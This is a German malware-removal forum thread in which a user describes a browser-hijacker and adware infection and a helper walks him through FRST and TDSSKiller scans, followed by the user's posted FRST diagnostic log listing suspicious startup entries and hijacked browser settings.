Reimage Repair Werbung / Links öffnen nicht / Alle Browser hängen sich auf

AresInvicta · 11.03.2017, 12:20

Hallo und guten Morgen!

In diesem Thread hat jemand ein ähnliches Problem wie ich: http://www.trojaner-board.de/184578-...adblocker.html
Dennoch habe ich gelesen ich soll nicht die selben Schritte befolgen auch wenn es den Anschein erweckt, es wäre dieselbe Ursache.
Mein Problem besteht aus mehreren Fehlermeldungen:

Reimage Repair öffnet sich bei fast JEDEM Link den ich anklicke.
Teilweise muss ich 5-6 Mal Links anklicken um da zu landen wo ich hin will.
Dies geschieht in jedem Browser (Chrome, Explorer, Firefox).
Meine Suchmaschinen-Einstellung lässt sich seitdem nicht mehr ändern und es werden regelmäßig Add-ons installiert (Ultimate Shopping Search etc).
Sobald ich diese lösche installieren sich diese selbstständig beim Start des PCs neu.
Wenn ich den Rechner anschalte kommt folgende Meldung:
"Regsvr32 zum Registrieren eines Moduls muss der Name einer Binärdatei angegeben werden!"

Leider bin ich zu Spät auf dieses Forum gestoßen und habe das erste Mal versucht mithilfe von dem Programm "UnhackMe" die Viren loszuwerden.
Gefühlt hat es das jedoch nur schlimmer gemacht.
Ich hoffe jemand hat eine Idee, wie ich das Problem wieder in den Griff bekommen kann.
Vielen Dank und freundliche Grüße!

M-K-D-B · 11.03.2017, 15:51

Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.

Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:

Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.
Lies dir meine Anleitungen immer sorgfältig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.
Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr benötigst. Dann lösche ich dein Thema aus meinem Abo. Solltest du einmal länger abwesend sein, so gib mir bitte Bescheid!
Während der Bereinigung bitte nichts installieren oder deinstallieren, außer ich bitte dich darum!
Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!
Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!
Einige Programme, die wir hier verwenden, können unter Umständen von deinem Antiviren- oder Anti-Malwareprogramm fälschlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme können aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "böse" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausführung eines Programms deaktivieren, damit unsere Bereinigungsvorgänge nicht beeinträchtigt werden.
Sollten die Logdateien einmal die zulässige Länge (~ 120.000 Zeichen) überschreiten, so teile die Logdateien auf mehrere Posts auf.
Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.
Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen heißt nicht automatisch, dass dein Rechner bereits vollständig sauber ist.

Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke aauf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Danke für deine Mitarbeit!

Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Schritt 2
Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

Bitte poste mit deiner nächsten Antwort

die Logdatei von TDSS-Killer,
die beiden neuen Logdateien von FRST.

AresInvicta · 11.03.2017, 16:46

Hallo und erstmal vielen Dank für die Antwort!

FRST:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 11-03-2017
durchgeführt von Dominik (Administrator) auf DOMINIK-PC (11-03-2017 16:39:59)
Gestartet von F:\Desktop
Geladene Profile: Dominik (Verfügbare Profile: Dominik)
Platform: Windows 7 Enterprise Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
(© 2015 Microsoft Corporation) C:\Users\Dominik\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe
(AVM Berlin) C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
() C:\ProgramData\PrefsSecure\Nettrans.exe
() C:\Windows\SysWOW64\NetUtils2016.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avscan.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [61896 2016-12-29] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [917576 2017-02-05] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-07-21] (Raptr, Inc)
HKLM-x32\...\Run: [AVMWlanClient] => C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe [937984 2015-10-01] (AVM Berlin)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskP\DiskPower.exe"
HKLM-x32\...\Run: [BestCleaner] => "C:\Program Files (x86)\BeCleaner\BestCleaner.exe" <===== ACHTUNG
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [Steam] => "F:\Program Files\steam.exe" -silent
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [BingSvc] => C:\Users\Dominik\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [RWSMSDD0KW] => "C:\Program Files\CIA9KT8HZ1\CIA9KT8HZ.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [4IGEHZ47Q2] => "C:\Program Files (x86)\DiskP\SSUBE.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [8JTWQ6V9KI] => "C:\Program Files\BXDVXYNZA6\BXDVXYNZA.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [IO0JTZT814] => "C:\Program Files (x86)\BeCleaner\4YLPY.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [YlPack] => C:\Users\Dominik\AppData\Local\YlPack\7f5fa15c2802891dc341d97a85b5cf7c.exe
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [JHF82ONEEJ] => "C:\Program Files\BMJWYKNX12\BMJWYKNX1.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [FG2WF9QDAN] => "C:\Program Files\JSO2JLBN37\JSO2JLBN3.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [MI84H8NRMW] => "C:\Program Files\WS4B8H5XSR\WS4B8H5XS.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [TG76TVZ2R1] => "C:\Program Files\DIN8PO21L4\DIN8PO21L.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [YRCPZ90UR7] => "C:\Program Files\7OHOBHWLP9\7OHOBHWLP.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [DLE0J3I15F] => "C:\Program Files\MJJZVBDT3G\MJJZVBDT3.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [PO96OB1AXQ] => "C:\Program Files\VDGBYFEBFY\VDGBYFEBF.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [77GQPWS9BU] => "C:\Program Files\LRJ6346S7K\LRJ6346S7.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [XTEC8CP1ZV] => "C:\Program Files\ADO2UTX8BS\ADO2UTX8B.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\Run: [PIE3FT9Y7T] => "C:\Program Files\PE8WPINWZP\23FBXITXZ.exe"
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\MountPoints2: {40aeb537-f211-11e6-8d1f-94de80bfdb2f} - E:\pushinst.exe
HKLM\...\Providers\2u1ym8ia: C:\Program Files (x86)\Ckerctyjolely Server\local64spl.dll [307200 2017-03-06] ()
ShellExecuteHooks: Kein Name - {EA4320F0-FFD8-11E6-B9E5-64006A5CFC23} - C:\Users\Dominik\AppData\Roaming\Leciryatiqt\Tajtion.dll -> Keine Datei
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5-x64 05 C:\Windows\system32\NSBlockA.dll => Keine Datei 
Winsock: Catalog5-x64 08 C:\Windows\system32\NSBlockB.dll => Keine Datei 
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{0BFB6CE6-9CEE-4108-AEF1-66C2DEF302EF}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{F2E01466-A90A-43BA-8FDE-04D76D4285E3}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkOOmCCYjHgvUD9jsjsmts9yAy4GDm7Z-V7cDPvaR4LGsu3Ap6WlxmMXUn78SF5t6BBwVBNyQOAEmD118wlstqhGdQr4Qh_N-gDgRjgv-aXcOdrrlnJjataOX458js6cOqsmiiqzHTNoaB1j0amMX574haAeq9Ow4pNyrow,&q={searchTerms}
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/de-de/?ocid=iehp
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkOOmCCYjHgvUD9jsjsmts9yAy4GDm7Z-V7cDPvaR4LGsu3Ap6WlxmMXUn78SF5t6BBwVBNyQOAEmD118wlstqhGdQr4Qh_N-gDgRjgv-aXcOdrrlnJjataOX458js6cOqsmiiqzHTNoaB1j0amMX574haAeq9Ow4pNyrow,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000 -> {DBECC832-A6AB-4233-9B95-B71DB756866B} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=14101
SearchScopes: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000 -> {F8FC734F-8347-4A1D-B074-46DEA9FA2690} URL = hxxp://services.eshield.com/tb/search.php?guid={EB9F7F4F-5E7D-4EAA-A423-37406F6DD6A7}&k={searchTerms}&action=default_search
SearchScopes: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkOOmCCYjHgvUD9jsjsmts9yAy4GDm7Z-V7cDPvaR4LGsu3Ap6WlxmMXUn78SF5t6BBwVBNyQOAEmD118wlstqhGdQr4Qh_N-gDgRjgv-aXcOdrrlnJjataOX458js6cOqsmiiqzHTNoaB1j0amMX574haAeq9Ow4pNyrow,&q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: Kein Name -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> Keine Datei
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO: Kein Name -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> Keine Datei
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: Kein Name -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> Keine Datei
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: AviraBrowserSafety.BrowserSafety -> {c3c77255-42c0-499f-b664-6e981a0b1647} -> C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
BHO-x32: Kein Name -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> Keine Datei
Handler-x32: abs - {E00957BD-D0E1-4eb9-A025-7743FDC8B27B} - C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\906yBQwi.default\Profiles\906yBQwi.default [nicht gefunden]
FF ProfilePath: C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default [2017-03-09]
FF user.js: detected! => C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\user.js [2017-03-06]
FF Keyword.URL: Mozilla\Firefox\Profiles\906yBQwi.default -> hxxp://search.eshield.com/serp?guid={EB9F7F4F-5E7D-4EAA-A423-37406F6DD6A7}&k=
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\906yBQwi.default -> eShield Safe Web
FF Homepage: Mozilla\Firefox\Profiles\906yBQwi.default -> C:\ProgramData\Voyasollams\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\906yBQwi.default -> C:\ProgramData\Voyasollams\ff.NT
FF Extension: (Kein Name) - C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\Extensions\abs@avira.com [2017-03-09] [ist nicht signiert]
FF SearchPlugin: C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\searchplugins\2u1ym8ia.xml [2017-03-06]
FF SearchPlugin: C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\searchplugins\findit.xml [2017-03-06]
FF HKLM-x32\...\Firefox\Extensions: [@ultimateshoppingsearch] - C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\extensions\@ultimateshoppingsearch.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{0E260C16-0B27-4A57-9099-4FD00DD1E97E}] - C:\Windows\Installer\{A27C8C1E-0B6E-4B31-8470-295F3B658157}\{0E260C16-0B27-4A57-9099-4FD00DD1E97E}.xpi
FF Extension: (&#x2063;) - C:\Windows\Installer\{A27C8C1E-0B6E-4B31-8470-295F3B658157}\{0E260C16-0B27-4A57-9099-4FD00DD1E97E}.xpi [2017-03-06]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR DefaultSearchURL: Profile 1 -> hxxp://search.eshield.com/search/{searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> {searchTerms}
CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-03-09] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-03-06]
CHR Extension: (Google Docs) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-06]
CHR Extension: (Google Drive) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-06]
CHR Extension: (YouTube) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-06]
CHR Extension: (Search engine by eShield) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\edbmobghbfpobjijpbkahojamahhjhgo [2017-03-06]
CHR Extension: (ultimateshoppingsearch) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\eiibddcohpjhajbnfkpboacmohommppp [2017-03-06]
CHR Extension: (Bing) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-03-06]
CHR Extension: (Browser Hunt) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fdckocnfhibclnnkifmjbbogcfkbijki [2017-03-06]
CHR Extension: (Google Tabellen) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-03-06]
CHR Extension: (Avira Browserschutz) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-03-06]
CHR Extension: (Google Docs Offline) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-06]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-06]
CHR Extension: (Google Mail) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-06]
CHR Extension: (Chrome Media Router) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-06]
CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Guest Profile [2017-03-08]
CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1 [2017-03-11]
CHR Extension: (Search engine by eShield) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\edbmobghbfpobjijpbkahojamahhjhgo [2017-03-09]
CHR Extension: (Avira Browserschutz) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-03-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Chrome Media Router) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-09]
CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\System Profile [2017-03-09]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [edbmobghbfpobjijpbkahojamahhjhgo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eiibddcohpjhajbnfkpboacmohommppp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [351944 2015-11-13] (Advanced Micro Devices, Inc.)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [1089592 2017-02-05] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [476736 2017-02-05] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [476736 2017-02-05] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1490296 2017-02-05] (Avira Operations GmbH & Co. KG)
S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1146128 2016-12-06] (AVG Technologies CZ, s.r.o.)
